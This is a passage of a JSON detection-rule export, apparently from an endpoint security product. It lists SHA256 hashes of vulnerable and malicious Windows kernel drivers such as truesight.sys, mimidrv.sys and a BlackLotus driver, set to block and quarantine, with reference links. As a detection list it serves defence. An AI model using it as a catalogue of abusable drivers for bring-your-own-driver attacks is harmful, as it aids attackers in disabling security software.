"Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed913085-5e2e-512f-aeab-3c058684ab9f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620406Z", + "creation_date": "2026-03-23T11:45:29.620408Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620413Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed9188d2-8033-52ac-a435-27ba71c9b60e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.825793Z", + "creation_date": "2026-03-23T11:45:31.825797Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825805Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66b6eac3fbe350daff338f36a721b9428ca0a0e68044c9922754470640dc4e30", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ed933ecb-779b-5fde-a7ed-512119307727", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615657Z", + "creation_date": "2026-03-23T11:45:29.615659Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1c18591d7b68fafa870f3d0f1124a353682765236674cc7476c5f1cc71b1528", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "edbf231a-c25d-59b7-8492-85f5e2a0f5ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499856Z", + "creation_date": "2026-03-23T11:45:31.499859Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499881Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5684e046f0ea1f403754d81777ebba5dc5988355c05e204910ba2b892e749cb0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "edc746f7-8927-589d-85ea-248801903fda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481841Z", + "creation_date": "2026-03-23T11:45:31.481844Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa197d0569bc9871bcc78e307e744ccd973d05aaee2b1a297d2ad0c6df427262", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "edd0faab-d72a-5a85-9fbd-174bc1f43368", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463642Z", + "creation_date": "2026-03-23T11:45:30.463646Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463654Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "569fe70bedd0df8585689b0e88ad8bd0544fdf88b9dbfc2076f4bdbcf89c28aa", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "edd30f7b-11e4-5764-ad93-d6d76cde2e6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828724Z", + "creation_date": "2026-03-23T11:45:31.828726Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828732Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ceb5fb4546ea5cff844d1e0b90b60040bec49caaf4eed3b38a42e98952d62a5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ede0e491-01da-5aa6-8da1-5bfc3f524519", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816785Z", + "creation_date": "2026-03-23T11:45:30.816787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816793Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11832c345e9898c4f74d3bf8f126cf84b4b1a66ad36135e15d103dbf2ac17359", + "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ede873ed-cb66-56de-ab35-1713983ebc34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143980Z", + "creation_date": "2026-03-23T11:45:32.143982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143988Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88f36fda7dcc6d5af2bcbef29d14fd4032247d4b45f5299944be31441ab53bc1", + "comment": "Vulnerable Kernel Driver (aka CSC.sys) [https://www.loldrivers.io/drivers/1c92e1bf-103b-4545-b242-e5a9858ec9c8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "edf1a25a-2899-5820-b9ab-bb5b7a26aff9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, 
+ "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622174Z", + "creation_date": "2026-03-23T11:45:29.622176Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e", + "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "edf7f554-cb75-59f6-bdd5-b6fb7897d46f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836468Z", + "creation_date": "2026-03-23T11:45:30.836471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836476Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c77a23599f2eab14c330798defb9189fe1983a394cbee62dbcb725b365c9645b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee16ce9a-f275-5daa-94e9-44b3648485dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829125Z", + "creation_date": "2026-03-23T11:45:31.829128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "304c18db58ffbdc11d35a5475a682c95ab932468cc84c31e98deaa0680fe7ea2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee1b86ce-53fd-57a6-ab83-a7fdfa460f60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483340Z", + "creation_date": 
"2026-03-23T11:45:31.483344Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483353Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a33cbfa4c55625d74ced7b1b6c74433fd57882f65677ebe2010191dd8812f0b3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee1c2bab-e320-51e3-a245-96cbd130303e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978170Z", + "creation_date": "2026-03-23T11:45:29.978172Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978178Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83ac9bf01c2d2ab0f66782fade462864f42b86e53dc455e1441c2a16d0ec2847", + "comment": "Malicious Kernel Driver (aka 0x3040_blacklotus_beta_driver.sys) [https://www.loldrivers.io/drivers/8750b245-af35-4bc6-9af3-dc858f9db64f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"ee35292b-b6c0-5326-a863-c803f917f178", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154656Z", + "creation_date": "2026-03-23T11:45:31.154658Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a192d1cd870059a96661cb4ec05d5acdb0c7588aeacb390805237e55cf10f073", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee4ac39b-c7ff-5b43-b199-284e93fff580", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160570Z", + "creation_date": "2026-03-23T11:45:31.160572Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.160577Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4ca5d33aef0a2c435fdf1d4d7ee7726121c5b3857249255ab92861dafaf8b06", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee4f24ab-fa60-5a37-8f94-4c0a3ab7ed84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606139Z", + "creation_date": "2026-03-23T11:45:29.606141Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606146Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77950e2a40ac0447ae7ee1ee3ef1242ce22796a157074e6f04e345b1956e143c", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee50abb9-7836-5c47-8f3f-7d75e5dd9bd0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820012Z", + "creation_date": "2026-03-23T11:45:30.820014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820020Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "abbf92203a31c93b8e719cdabff1c681921edbaf43cd34da79c86cb5a806757f", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee667ac4-91de-5cb7-8d10-14a9e7e9f9cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822522Z", + "creation_date": "2026-03-23T11:45:31.822526Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822534Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"09f0ae64632dc0122b29d4708217d7a8332fef12d91bc8bae5c66ae6c9067385", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee754b0d-36fd-5d32-b057-a77d8b1079c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469836Z", + "creation_date": "2026-03-23T11:45:30.469840Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469849Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58ed3bafe401102ddf52c9c2e006408ef181ceaf85741a73328d8fe92195edca", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee961be6-32df-5df7-a822-784c26004ba7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820266Z", + "creation_date": "2026-03-23T11:45:30.820268Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820274Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3fc8f8dddbd471fa2d5deb292552876b3c737b09149307f901e38b53cd62648", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ee98abba-b4e4-501b-ac4f-9b16d36c4f92", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150599Z", + "creation_date": "2026-03-23T11:45:31.150601Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150606Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19a6d53a72915b456b800c699c38b30aaaa009939b9ea1e1fa229d57f1ca46db", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eead8ee9-b9bd-51d0-8674-4f54d5b5be3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479992Z", + "creation_date": "2026-03-23T11:45:30.479994Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479999Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ca20c63d8f56c09c48d0faa1894f2e3fccd4b029fd711d9864355e5f29c19f8", + "comment": "Vulnerable Kernel Driver (aka AsmIo64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eeb016a8-5e5e-5744-a789-c9a1a68f5318", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486801Z", + "creation_date": "2026-03-23T11:45:31.486804Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486813Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89a6952035427dfbb70e27e1456e8b13648f205609871924027f4dfc3ade37cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eeb71fcb-1aa6-5bf3-b1e9-0b20981ee673", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831748Z", + "creation_date": "2026-03-23T11:45:30.831750Z", + 